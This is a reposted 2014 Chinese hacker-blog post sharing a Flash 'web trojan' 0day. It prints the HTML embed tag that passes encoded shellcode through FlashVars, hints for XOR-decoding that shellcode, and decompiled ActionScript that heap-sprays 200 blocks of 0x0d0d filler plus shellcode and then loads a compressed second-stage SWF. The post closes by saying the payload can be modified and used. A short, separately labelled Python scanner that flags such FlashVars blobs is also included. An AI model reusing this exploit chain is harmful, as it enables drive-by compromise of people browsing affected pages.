
Flash 0day: latest 天窗 (Tianchuang, "skylight") web trojan 0day - 中国寒龙

Posted: 2014-12-19 00:29:16      Views: 296      Comments: 0      Favorites: 0

Tags: http   ar   io   color   use   sp   for   on   bs

The following is the quoted snippet:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0"
width="550" height="400" id="sdfasdf" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="false" />
<param name="movie" value="nb.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="FlashVars" value="sc=[long %25u-encoded shellcode blob removed]" />

<embed flashvars="sc=[same %25u-encoded shellcode blob as the FlashVars param above, removed]"
quality="high" bgcolor="#ffffff" width="550" height="400" name="sdfasdf" align="middle"
allowScriptAccess="sameDomain" allowFullScreen="false" type="application/x-shockwave-flash"
pluginspage="http://www.adobe.com/go/getflashplayer_cn" /></object>


    The shellcode portion is XOR-encoded with the key bd. Drop it into FreShow, enter the key and decode it twice, and the address appears. nb.swf was decompiled with 硕思 (Sothink); the resulting code is:

nb.swf decompiled code:

package sdfasdf_fla
{
    import flash.display.*;
    import flash.events.*;
    import flash.net.*;
    import flash.utils.*;
 
    dynamic public class MainTimeline extends MovieClip
    {
        public var a:String;        // spray block: 0x0d0d filler followed by the shellcode
        public var i:Object;
        public var b:String;        // shellcode, taken from the FlashVars parameter "sc"
        public var loader:Loader;
        public var t:String;        // one filler unit, appended repeatedly to build a
        public var len:Object;      // target block length, in UTF-16 code units
        public var ul:URLLoader;
        public var array:Array;     // keeps the 200 sprayed ByteArrays alive
 
        public function MainTimeline()
        {
            addFrameScript(0, this.frame1);
            return;
        }// end function

        function frame1()
        {
            // Filler unit: two UTF-16 units of 0x0d0d.
            this.a = unescape("%u0d0d%u0d0d");
            this.t = this.a;
            // The shellcode arrives %u-escaped in the HTML FlashVars "sc" parameter shown above.
            this.b = unescape(stage.loaderInfo.parameters.sc);
            // Block length: 1M units minus the shellcode minus a 256-unit margin.
            this.len = 1048576 - this.b.length - 256;
            while (this.a.length < this.len)
            {
                this.a = this.a + this.t;
            }
            this.a = this.a + this.b;
            // Heap spray: 200 ByteArrays, each holding the filler + shellcode block
            // written as UTF-16 ("unicode"), so each block is about 2 MB.
            this.array = new Array();
            this.i = 0;
            while (this.i < 200)
            {
                this.array[this.i] = new ByteArray();
                this.array[this.i].writeMultiByte(this.a, "unicode");
                this.i++;   // the decompiler emitted a bogus "_loc_1.i = this.i++" here
            }
            // Second stage: fetch encoded.swf as binary, inflate it and load it as a SWF.
            this.ul = new URLLoader();
            this.ul.dataFormat = URLLoaderDataFormat.BINARY;
            this.ul.addEventListener(Event.COMPLETE, this.onComplete);
            this.ul.load(new URLRequest("encoded.swf"));
            this.loader = new Loader();
            addChild(this.loader);
            trace("xxxxxxxxxxxxxxxxx");
            return;
        }// end function
 
        public function onComplete(param1:Event) : void
        {
            var _loc_2:* = (param1.target as URLLoader).data;
            _loc_2.uncompress();          // encoded.swf is stored zlib-compressed
            this.loader.loadBytes(_loc_2);
            return;
        }// end function

    }
}
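
As an added example (not part of the original post), the following Python scanner pulls the FlashVars parameter out of an object tag, undoes the single browser-side percent-decoding that turns %25u9090 into %u9090, and flags any variable carrying a long run of %u escapes, which is the form the frame1() code above hands to unescape(). The HTML and the FlashVars value inside it are constructed for this example and are not the page's payload.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample HTML in the shape of the object tag above. The FlashVars
# value here is a made-up placeholder, not the page's payload.
SAMPLE_HTML = """<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000">
<param name="movie" value="nb.swf" />
<param name="FlashVars" value="sc=%25u9090%25u9090%25u4141%25u4242%25u4343%25u4444" />
</object>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000">
<param name="movie" value="player.swf" />
<param name="FlashVars" value="autoplay=true&amp;file=clip%2Eflv" />
</object>"""

FLASHVARS_RE = re.compile(r'<param\s+name="FlashVars"\s+value="([^"]*)"', re.I)
UESC_RUN_RE = re.compile(r'(?:%u[0-9a-fA-F]{4})+')


def parse_flashvars(attr_value: str) -> dict:
    """Turn an HTML-escaped FlashVars attribute into {variable: raw value}.

    Only HTML entities and ONE layer of %XX decoding are undone, which is what
    the browser does before handing the string to the SWF: '%25u9090' becomes
    '%u9090', the form AS3 unescape() later consumes.
    """
    text = unquote(html.unescape(attr_value))
    pairs = (kv.split("=", 1) for kv in text.split("&") if "=" in kv)
    return {k: v for k, v in pairs}


def escape_run_units(value: str) -> int:
    """Longest run of consecutive %uXXXX escapes, counted in UTF-16 code units."""
    return max((len(run) // 6 for run in UESC_RUN_RE.findall(value)), default=0)


def scan_html(page: str, min_units: int = 4) -> list:
    """Flag FlashVars variables whose value is a %u-escaped binary blob.

    The spray code above calls unescape(stage.loaderInfo.parameters.sc), so a
    long %u run in FlashVars is an indicator visible in the HTML alone.
    """
    findings = []
    for m in FLASHVARS_RE.finditer(page):
        for name, value in parse_flashvars(m.group(1)).items():
            units = escape_run_units(value)
            if units >= min_units:
                findings.append({"var": name, "units": units, "bytes": units * 2})
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"suspicious FlashVars '{f['var']}': {f['bytes']}-byte %u blob")
```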


    After unpacking it you will find there is also an encoded.swf, which must be downloaded as well; however, that swf has been processed (obfuscated) and 硕思 (Sothink) cannot decompile it. Still, in its current state it can already be modified and used normally!



Original URL: http://www.cnblogs.com/Hkadmin/p/4172984.html
